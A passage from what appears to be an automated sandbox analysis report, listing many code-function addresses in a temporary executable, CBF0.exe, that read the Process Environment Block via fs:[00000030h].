Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B618A62 mov eax, dword ptr fs:[00000030h]		29_2_6B618A62
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5D4257 mov eax, dword ptr fs:[00000030h]		29_2_6B5D4257
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B542240 mov ecx, dword ptr fs:[00000030h]		29_2_6B542240
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B542240 mov eax, dword ptr fs:[00000030h]		29_2_6B542240
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B549240 mov eax, dword ptr fs:[00000030h]		29_2_6B549240
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B549240 mov eax, dword ptr fs:[00000030h]		29_2_6B549240
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B549240 mov eax, dword ptr fs:[00000030h]		29_2_6B549240
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B549240 mov eax, dword ptr fs:[00000030h]		29_2_6B549240
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5D4248 mov eax, dword ptr fs:[00000030h]		29_2_6B5D4248
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B58927A mov eax, dword ptr fs:[00000030h]		29_2_6B58927A
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5FB260 mov eax, dword ptr fs:[00000030h]		29_2_6B5FB260
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5FB260 mov eax, dword ptr fs:[00000030h]		29_2_6B5FB260
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B545210 mov eax, dword ptr fs:[00000030h]		29_2_6B545210
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B545210 mov ecx, dword ptr fs:[00000030h]		29_2_6B545210
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B545210 mov eax, dword ptr fs:[00000030h]		29_2_6B545210
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B545210 mov eax, dword ptr fs:[00000030h]		29_2_6B545210
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B563A1C mov eax, dword ptr fs:[00000030h]		29_2_6B563A1C
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B558A0A mov eax, dword ptr fs:[00000030h]		29_2_6B558A0A
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B548239 mov eax, dword ptr fs:[00000030h]		29_2_6B548239
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B548239 mov eax, dword ptr fs:[00000030h]		29_2_6B548239
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B548239 mov eax, dword ptr fs:[00000030h]		29_2_6B548239
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B544A20 mov eax, dword ptr fs:[00000030h]		29_2_6B544A20
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B544A20 mov eax, dword ptr fs:[00000030h]		29_2_6B544A20
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5CEA20 mov eax, dword ptr fs:[00000030h]		29_2_6B5CEA20
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B56A229 mov eax, dword ptr fs:[00000030h]		29_2_6B56A229
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B56A229 mov eax, dword ptr fs:[00000030h]		29_2_6B56A229
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B56A229 mov eax, dword ptr fs:[00000030h]		29_2_6B56A229
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B56A229 mov eax, dword ptr fs:[00000030h]		29_2_6B56A229
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B56A229 mov eax, dword ptr fs:[00000030h]		29_2_6B56A229
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B56A229 mov eax, dword ptr fs:[00000030h]		29_2_6B56A229
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B56A229 mov eax, dword ptr fs:[00000030h]		29_2_6B56A229
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B56A229 mov eax, dword ptr fs:[00000030h]		29_2_6B56A229
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B56A229 mov eax, dword ptr fs:[00000030h]		29_2_6B56A229
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B604AEF mov eax, dword ptr fs:[00000030h]		29_2_6B604AEF
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B604AEF mov eax, dword ptr fs:[00000030h]		29_2_6B604AEF
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B604AEF mov eax, dword ptr fs:[00000030h]		29_2_6B604AEF
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B604AEF mov eax, dword ptr fs:[00000030h]		29_2_6B604AEF
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B604AEF mov eax, dword ptr fs:[00000030h]		29_2_6B604AEF
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B604AEF mov eax, dword ptr fs:[00000030h]		29_2_6B604AEF
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B604AEF mov eax, dword ptr fs:[00000030h]		29_2_6B604AEF
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B604AEF mov eax, dword ptr fs:[00000030h]		29_2_6B604AEF
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B604AEF mov eax, dword ptr fs:[00000030h]		29_2_6B604AEF
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B604AEF mov eax, dword ptr fs:[00000030h]		29_2_6B604AEF
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B604AEF mov eax, dword ptr fs:[00000030h]		29_2_6B604AEF
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B604AEF mov eax, dword ptr fs:[00000030h]		29_2_6B604AEF
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B604AEF mov eax, dword ptr fs:[00000030h]		29_2_6B604AEF
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B604AEF mov eax, dword ptr fs:[00000030h]		29_2_6B604AEF
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B545AC0 mov eax, dword ptr fs:[00000030h]		29_2_6B545AC0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B545AC0 mov eax, dword ptr fs:[00000030h]		29_2_6B545AC0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B545AC0 mov eax, dword ptr fs:[00000030h]		29_2_6B545AC0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B572ACB mov eax, dword ptr fs:[00000030h]		29_2_6B572ACB
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B543ACA mov eax, dword ptr fs:[00000030h]		29_2_6B543ACA
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B572AE4 mov eax, dword ptr fs:[00000030h]		29_2_6B572AE4
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B618ADD mov eax, dword ptr fs:[00000030h]		29_2_6B618ADD
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B57D294 mov eax, dword ptr fs:[00000030h]		29_2_6B57D294
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B57D294 mov eax, dword ptr fs:[00000030h]		29_2_6B57D294
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B57DA88 mov eax, dword ptr fs:[00000030h]		29_2_6B57DA88
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B57DA88 mov eax, dword ptr fs:[00000030h]		29_2_6B57DA88
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B55AAB0 mov eax, dword ptr fs:[00000030h]		29_2_6B55AAB0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B55AAB0 mov eax, dword ptr fs:[00000030h]		29_2_6B55AAB0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5712BD mov esi, dword ptr fs:[00000030h]		29_2_6B5712BD
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5712BD mov eax, dword ptr fs:[00000030h]		29_2_6B5712BD
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5712BD mov eax, dword ptr fs:[00000030h]		29_2_6B5712BD
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B541AA0 mov eax, dword ptr fs:[00000030h]		29_2_6B541AA0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B575AA0 mov eax, dword ptr fs:[00000030h]		29_2_6B575AA0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B575AA0 mov eax, dword ptr fs:[00000030h]		29_2_6B575AA0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B60E962 mov eax, dword ptr fs:[00000030h]		29_2_6B60E962
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B618966 mov eax, dword ptr fs:[00000030h]		29_2_6B618966
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B54395E mov eax, dword ptr fs:[00000030h]		29_2_6B54395E
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B54395E mov eax, dword ptr fs:[00000030h]		29_2_6B54395E
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B56B944 mov eax, dword ptr fs:[00000030h]		29_2_6B56B944
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B56B944 mov eax, dword ptr fs:[00000030h]		29_2_6B56B944
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B54B171 mov eax, dword ptr fs:[00000030h]		29_2_6B54B171
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B54B171 mov eax, dword ptr fs:[00000030h]		29_2_6B54B171
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B549100 mov eax, dword ptr fs:[00000030h]		29_2_6B549100
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B549100 mov eax, dword ptr fs:[00000030h]		29_2_6B549100
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B549100 mov eax, dword ptr fs:[00000030h]		29_2_6B549100
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B550100 mov eax, dword ptr fs:[00000030h]		29_2_6B550100
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B550100 mov eax, dword ptr fs:[00000030h]		29_2_6B550100
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B550100 mov eax, dword ptr fs:[00000030h]		29_2_6B550100
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B543138 mov ecx, dword ptr fs:[00000030h]		29_2_6B543138
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B57513A mov eax, dword ptr fs:[00000030h]		29_2_6B57513A
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B57513A mov eax, dword ptr fs:[00000030h]		29_2_6B57513A
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B6189E7 mov eax, dword ptr fs:[00000030h]		29_2_6B6189E7
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5599C7 mov eax, dword ptr fs:[00000030h]		29_2_6B5599C7
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5599C7 mov eax, dword ptr fs:[00000030h]		29_2_6B5599C7
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5599C7 mov eax, dword ptr fs:[00000030h]		29_2_6B5599C7
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5599C7 mov eax, dword ptr fs:[00000030h]		29_2_6B5599C7
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5431E0 mov eax, dword ptr fs:[00000030h]		29_2_6B5431E0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5D41E8 mov eax, dword ptr fs:[00000030h]		29_2_6B5D41E8
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B54B1E1 mov eax, dword ptr fs:[00000030h]		29_2_6B54B1E1
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B54B1E1 mov eax, dword ptr fs:[00000030h]		29_2_6B54B1E1
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B54B1E1 mov eax, dword ptr fs:[00000030h]		29_2_6B54B1E1
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B6049A4 mov eax, dword ptr fs:[00000030h]		29_2_6B6049A4
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B6049A4 mov eax, dword ptr fs:[00000030h]		29_2_6B6049A4
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B6049A4 mov eax, dword ptr fs:[00000030h]		29_2_6B6049A4
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B6049A4 mov eax, dword ptr fs:[00000030h]		29_2_6B6049A4
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B574190 mov eax, dword ptr fs:[00000030h]		29_2_6B574190
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B572990 mov eax, dword ptr fs:[00000030h]		29_2_6B572990
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B54519E mov eax, dword ptr fs:[00000030h]		29_2_6B54519E
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B54519E mov ecx, dword ptr fs:[00000030h]		29_2_6B54519E
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B57A185 mov eax, dword ptr fs:[00000030h]		29_2_6B57A185
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B56C182 mov eax, dword ptr fs:[00000030h]		29_2_6B56C182
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B61F1B5 mov eax, dword ptr fs:[00000030h]		29_2_6B61F1B5
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B61F1B5 mov eax, dword ptr fs:[00000030h]		29_2_6B61F1B5
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5C51BE mov eax, dword ptr fs:[00000030h]		29_2_6B5C51BE
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5C51BE mov eax, dword ptr fs:[00000030h]		29_2_6B5C51BE
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5C51BE mov eax, dword ptr fs:[00000030h]		29_2_6B5C51BE
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5C51BE mov eax, dword ptr fs:[00000030h]		29_2_6B5C51BE
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B57C9BF mov eax, dword ptr fs:[00000030h]		29_2_6B57C9BF
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B57C9BF mov eax, dword ptr fs:[00000030h]		29_2_6B57C9BF
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5699BF mov ecx, dword ptr fs:[00000030h]		29_2_6B5699BF
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5699BF mov ecx, dword ptr fs:[00000030h]		29_2_6B5699BF
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5699BF mov eax, dword ptr fs:[00000030h]		29_2_6B5699BF
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5699BF mov ecx, dword ptr fs:[00000030h]		29_2_6B5699BF
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5699BF mov ecx, dword ptr fs:[00000030h]		29_2_6B5699BF
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5699BF mov eax, dword ptr fs:[00000030h]		29_2_6B5699BF
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5699BF mov ecx, dword ptr fs:[00000030h]		29_2_6B5699BF
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5699BF mov ecx, dword ptr fs:[00000030h]		29_2_6B5699BF
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5699BF mov eax, dword ptr fs:[00000030h]		29_2_6B5699BF
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5699BF mov ecx, dword ptr fs:[00000030h]		29_2_6B5699BF
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5699BF mov ecx, dword ptr fs:[00000030h]		29_2_6B5699BF
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5699BF mov eax, dword ptr fs:[00000030h]		29_2_6B5699BF
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B60A189 mov eax, dword ptr fs:[00000030h]		29_2_6B60A189
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B60A189 mov ecx, dword ptr fs:[00000030h]		29_2_6B60A189
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5761A0 mov eax, dword ptr fs:[00000030h]		29_2_6B5761A0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5761A0 mov eax, dword ptr fs:[00000030h]		29_2_6B5761A0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B547055 mov eax, dword ptr fs:[00000030h]		29_2_6B547055
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B545050 mov eax, dword ptr fs:[00000030h]		29_2_6B545050
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B545050 mov eax, dword ptr fs:[00000030h]		29_2_6B545050
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B545050 mov eax, dword ptr fs:[00000030h]		29_2_6B545050
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B602073 mov eax, dword ptr fs:[00000030h]		29_2_6B602073
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B611074 mov eax, dword ptr fs:[00000030h]		29_2_6B611074
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B56F86D mov eax, dword ptr fs:[00000030h]		29_2_6B56F86D
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B54F018 mov eax, dword ptr fs:[00000030h]		29_2_6B54F018
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B54F018 mov eax, dword ptr fs:[00000030h]		29_2_6B54F018
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B546800 mov eax, dword ptr fs:[00000030h]		29_2_6B546800
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B546800 mov eax, dword ptr fs:[00000030h]		29_2_6B546800
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B546800 mov eax, dword ptr fs:[00000030h]		29_2_6B546800
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B558800 mov eax, dword ptr fs:[00000030h]		29_2_6B558800
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B56A830 mov eax, dword ptr fs:[00000030h]		29_2_6B56A830
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B56A830 mov eax, dword ptr fs:[00000030h]		29_2_6B56A830
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B56A830 mov eax, dword ptr fs:[00000030h]		29_2_6B56A830
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B56A830 mov eax, dword ptr fs:[00000030h]		29_2_6B56A830
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B614015 mov eax, dword ptr fs:[00000030h]		29_2_6B614015
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B614015 mov eax, dword ptr fs:[00000030h]		29_2_6B614015
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B574020 mov edi, dword ptr fs:[00000030h]		29_2_6B574020
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B61F019 mov eax, dword ptr fs:[00000030h]		29_2_6B61F019
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B61F019 mov eax, dword ptr fs:[00000030h]		29_2_6B61F019
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5470C0 mov eax, dword ptr fs:[00000030h]		29_2_6B5470C0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5470C0 mov eax, dword ptr fs:[00000030h]		29_2_6B5470C0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5528FD mov eax, dword ptr fs:[00000030h]		29_2_6B5528FD
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5528FD mov eax, dword ptr fs:[00000030h]		29_2_6B5528FD
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5528FD mov eax, dword ptr fs:[00000030h]		29_2_6B5528FD
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B56B8E4 mov eax, dword ptr fs:[00000030h]		29_2_6B56B8E4
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B56B8E4 mov eax, dword ptr fs:[00000030h]		29_2_6B56B8E4
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5440E1 mov eax, dword ptr fs:[00000030h]		29_2_6B5440E1
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5440E1 mov eax, dword ptr fs:[00000030h]		29_2_6B5440E1
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5440E1 mov eax, dword ptr fs:[00000030h]		29_2_6B5440E1
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5458EC mov eax, dword ptr fs:[00000030h]		29_2_6B5458EC
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B543880 mov eax, dword ptr fs:[00000030h]		29_2_6B543880
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B543880 mov eax, dword ptr fs:[00000030h]		29_2_6B543880
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B54E8B0 mov eax, dword ptr fs:[00000030h]		29_2_6B54E8B0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B54E8B0 mov eax, dword ptr fs:[00000030h]		29_2_6B54E8B0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B54E8B0 mov eax, dword ptr fs:[00000030h]		29_2_6B54E8B0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B54E8B0 mov eax, dword ptr fs:[00000030h]		29_2_6B54E8B0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B54E8B0 mov eax, dword ptr fs:[00000030h]		29_2_6B54E8B0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B54E8B0 mov eax, dword ptr fs:[00000030h]		29_2_6B54E8B0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B57F0BF mov ecx, dword ptr fs:[00000030h]		29_2_6B57F0BF
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B57F0BF mov eax, dword ptr fs:[00000030h]		29_2_6B57F0BF
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B57F0BF mov eax, dword ptr fs:[00000030h]		29_2_6B57F0BF
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5890AF mov eax, dword ptr fs:[00000030h]		29_2_6B5890AF
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5528AE mov eax, dword ptr fs:[00000030h]		29_2_6B5528AE
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5528AE mov eax, dword ptr fs:[00000030h]		29_2_6B5528AE
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5528AE mov eax, dword ptr fs:[00000030h]		29_2_6B5528AE
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5528AE mov ecx, dword ptr fs:[00000030h]		29_2_6B5528AE
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5528AE mov eax, dword ptr fs:[00000030h]		29_2_6B5528AE
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5528AE mov eax, dword ptr fs:[00000030h]		29_2_6B5528AE
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5D5F5F mov eax, dword ptr fs:[00000030h]		29_2_6B5D5F5F
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5D5F5F mov eax, dword ptr fs:[00000030h]		29_2_6B5D5F5F
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5D5F5F mov eax, dword ptr fs:[00000030h]		29_2_6B5D5F5F
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5D5F5F mov eax, dword ptr fs:[00000030h]		29_2_6B5D5F5F
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5D5F5F mov eax, dword ptr fs:[00000030h]		29_2_6B5D5F5F
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B618F6A mov eax, dword ptr fs:[00000030h]		29_2_6B618F6A
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B54A745 mov eax, dword ptr fs:[00000030h]		29_2_6B54A745
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B57DF4C mov eax, dword ptr fs:[00000030h]		29_2_6B57DF4C
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B546F60 mov eax, dword ptr fs:[00000030h]		29_2_6B546F60
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B546F60 mov eax, dword ptr fs:[00000030h]		29_2_6B546F60
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B56E760 mov eax, dword ptr fs:[00000030h]		29_2_6B56E760
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B56E760 mov eax, dword ptr fs:[00000030h]		29_2_6B56E760
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B57CF6A mov eax, dword ptr fs:[00000030h]		29_2_6B57CF6A
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B57CF6A mov eax, dword ptr fs:[00000030h]		29_2_6B57CF6A
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B56F716 mov eax, dword ptr fs:[00000030h]		29_2_6B56F716
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B574710 mov eax, dword ptr fs:[00000030h]		29_2_6B574710
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5DFF10 mov eax, dword ptr fs:[00000030h]		29_2_6B5DFF10
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5DFF10 mov eax, dword ptr fs:[00000030h]		29_2_6B5DFF10
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B57C707 mov eax, dword ptr fs:[00000030h]		29_2_6B57C707
